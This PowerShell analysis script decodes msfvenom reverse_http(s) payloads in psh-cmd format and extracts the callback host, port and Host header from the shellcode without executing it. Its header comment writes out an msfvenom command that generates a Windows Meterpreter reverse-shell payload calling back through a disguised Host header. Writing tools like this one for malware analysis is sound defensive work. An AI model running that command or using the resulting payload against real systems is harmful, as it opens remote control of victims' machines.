Extracts connection information (callback host, port and HTTP Host header) from reverse_http(s) payloads generated by msfvenom, at a minimum those in psh-cmd format.
<#
${msfvenom} -p windows/meterpreter/reverse_https LHOST=amazon.co.uk LPORT=443 HttpHostHeader=malicious.domain -f psh-cmd -o rev.cmd
MSFVenom-Info -Name rev.cmd
Output:
amazon.co.uk:443
Host: malicious.domain
#>
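Function Find-Pattern {
    <#
    .SYNOPSIS
    Returns the index of the first occurrence of $Pattern inside $Array, or -1 when absent.

    .DESCRIPTION
    A pattern element of -1 is a wildcard that matches any byte. Every other
    element must equal the byte at the same offset. An empty pattern yields -1.

    .PARAMETER Array
    The byte buffer to search.
    .PARAMETER Pattern
    The byte values to look for; -1 entries are wildcards.

    .OUTPUTS
    [int] Offset of the first match, or -1.
    #>
    Param (
        [Parameter(Mandatory=$True)]
        [byte[]]$Array,
        [Parameter(Mandatory=$True)]
        [int[]]$Pattern
    )
    Process {
        # Nothing to match against; keep the original "not found" result.
        if ($Pattern.Length -eq 0) {
            return -1
        }
        # Last start offset at which the whole pattern still fits in the buffer.
        $lastStart = $Array.Length - $Pattern.Length
        for ($i = 0; $i -le $lastStart; $i++) {
            $matched = $true
            for ($j = 0; $j -lt $Pattern.Length; $j++) {
                # Only non-wildcard positions are compared. Tracking a flag instead of
                # checking "$j is the last index" means a trailing -1 wildcard no longer
                # hides a successful match (the original skipped that check via continue).
                if ($Pattern[$j] -ne -1 -and $Array[$i + $j] -ne $Pattern[$j]) {
                    $matched = $false
                    break
                }
            }
            if ($matched) {
                return $i
            }
        }
        return -1
    }
}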
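Function MSFVenom-Info {
    <#
    .SYNOPSIS
    Prints the callback host, port and HTTP Host header embedded in an msfvenom psh-cmd reverse_http(s) payload.

    .DESCRIPTION
    The payload is unwrapped in three stages; none of the decoded content is executed,
    it is only decoded, decompressed and scanned:
      1. the last whitespace-separated token of the input is the base64 encoded,
         UTF-16LE first-stage script,
      2. that script carries a base64 encoded, gzip compressed second-stage script,
      3. the second stage carries the base64 encoded shellcode.
    The port is located by matching the byte sequence 6A 03 53 53 (push 3; push ebx;
    push ebx) followed by a push imm8 (6A xx) or push imm32 (68 lo hi 00 00). The host is
    found by scanning the NUL-terminated strings that follow an FF FF FF byte run, stopping
    early on a dotted-quad address. Both lookups are heuristics tied to the shellcode
    template this was written against and may fail on other templates.

    .PARAMETER Name
    Path of the psh-cmd file to analyse.
    .PARAMETER FileContent
    The raw psh-cmd text, accepted from the pipeline as an alternative to -Name.
    .PARAMETER DebugMode
    Also writes the decoded shellcode bytes (one value per line) to debug_shell.txt in the current directory.
    .PARAMETER GenerateHex
    Also writes the shellcode as a hex string to hexshell.txt in the current directory.
    .PARAMETER LastScript
    Also writes the decompressed second-stage script to lastscript.txt in the current directory.

    .OUTPUTS
    Strings: "<host>:<port>", the Host header line when present, then a list of the remaining
    printable strings. When a stage or the port pattern cannot be located, a message
    followed by 1.
    #>
    [cmdletbinding()]
    Param (
        [Parameter(Mandatory=$True, ParameterSetName="p1")]
        [string]$Name,
        [Parameter(Mandatory=$True,ValueFromPipeline=$True, ParameterSetName="p2")]
        [string]$FileContent,
        [switch]$DebugMode,
        [switch]$GenerateHex,
        [switch]$LastScript
    )
    Process {
        if ($PsCmdlet.ParameterSetName -eq "p1") {
            $infile = (Resolve-Path "$Name").Path
            $content = [IO.File]::ReadAllText("$infile").Trim()
        } else {
            $content = $FileContent.Trim()
        }

        # Stage 1: the final token of "powershell ... -e <base64>" is UTF-16LE script text.
        $firstStage = ($content -split " ")[-1]
        $content1 = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($firstStage))

        # Capture the quoted base64 argument in one regex instead of splitting on quote
        # characters. String.Split with a string separator is a literal split on .NET Core,
        # so the original "'|""" separator only worked where PowerShell coerced it to a
        # char[] (Windows PowerShell); the capture group accepts either quote style everywhere.
        $b64Arg = 'FromBase64String\(\s*[''"]([A-Za-z0-9+/=]+)[''"]'
        # Check the match before touching $Matches: on a failed -match it keeps its previous value.
        if (-not ($content1 -match $b64Arg)) {
            "Couldn't find the second stage"
            return 1
        }
        $secondStage = $Matches[1]

        # Stage 2: base64 + gzip. The streams are disposed rather than leaked.
        $s2 = New-Object IO.MemoryStream(, [Convert]::FromBase64String($secondStage))
        $gz = New-Object IO.Compression.GzipStream($s2, [IO.Compression.CompressionMode]::Decompress)
        $reader = New-Object IO.StreamReader($gz)
        try {
            $content2 = $reader.ReadToEnd()
        } finally {
            $reader.Dispose()
            $gz.Dispose()
            $s2.Dispose()
        }
        if ($LastScript.IsPresent) {
            $content2 > lastscript.txt
        }

        # Stage 3: the raw shellcode. It is decoded for inspection only, never invoked.
        if (-not ($content2 -match $b64Arg)) {
            "Couldn't find the shellcode stage"
            return 1
        }
        $shellcode = [Convert]::FromBase64String($Matches[1])
        if ($GenerateHex.IsPresent) {
            [System.BitConverter]::ToString($shellcode) -replace '-' > hexshell.txt
        }
        if ($DebugMode.IsPresent) {
            $shellcode > debug_shell.txt
        }

        # Port: 6A 03 53 53 (push 3; push ebx; push ebx) then either push imm8 (6A xx),
        # which the assembler typically emits for ports below 128, or push imm32
        # (68 lo hi 00 00). -1 in a pattern is a wildcard byte for Find-Pattern.
        $revhttp_imm8 = @(106, 3, 83, 83, 106)
        $revhttp_imm32 = @(106, 3, 83, 83, 104, -1, -1, 0, 0)
        $i = Find-Pattern $shellcode $revhttp_imm8
        if ($i -ne -1) {
            $port = $shellcode[$i + $revhttp_imm8.Length]
        } else {
            $i = Find-Pattern $shellcode $revhttp_imm32
            if ($i -eq -1) {
                "Couldn't find the port pattern"
                return 1
            }
            # Little-endian 16-bit immediate following the 68 opcode.
            $port = $shellcode[$i + 5] + $shellcode[$i + 6] * 256
        }

        # Host: each FF FF FF run is followed by a NUL-terminated string candidate. The loop
        # stops as soon as a candidate contains three dots (a dotted-quad IP); otherwise the
        # last non-empty candidate wins once no further run is found. This is a heuristic.
        $pattern = @(255, 255, 255)
        $cshellcode = $shellcode
        $i = 0
        $rhost = ""
        while (([regex]::Matches($rhost, "\.")).Count -ne 3) {
            $cshellcode = $cshellcode | Select-Object -Skip $i
            $i = Find-Pattern $cshellcode $pattern
            if ($i -eq -1) {
                break
            }
            $i += $pattern.Length
            # Length of the string up to its NUL; indexing past the end yields $null and stops the loop.
            $k = 0
            while ($cshellcode[$i + $k]) { $k++ }
            # Guard the empty-string case: "$i..($i - 1)" would be a descending two-element
            # range and produce two bytes of garbage instead of an empty candidate.
            if ($k -gt 0) {
                $rhost = [System.Text.Encoding]::ASCII.GetString($cshellcode[$i..($i + $k - 1)])
            }
        }
        "${rhost}:${port}"

        # The HttpHostHeader value is stored as a plain ASCII "Host: ..." header inside the shellcode.
        $ashell = [System.Text.Encoding]::ASCII.GetString($shellcode)
        $header_host = [regex]::Match($ashell, "(?i:Host): ?[\w\.:]+")
        if ($header_host.Value) { $header_host.Value }

        "`nRest of the printable strings:"
        foreach ($printableMatch in [regex]::Matches($ashell, "[\w\.:]{10,}")) {
            $printableMatch.Value
        }
    }
}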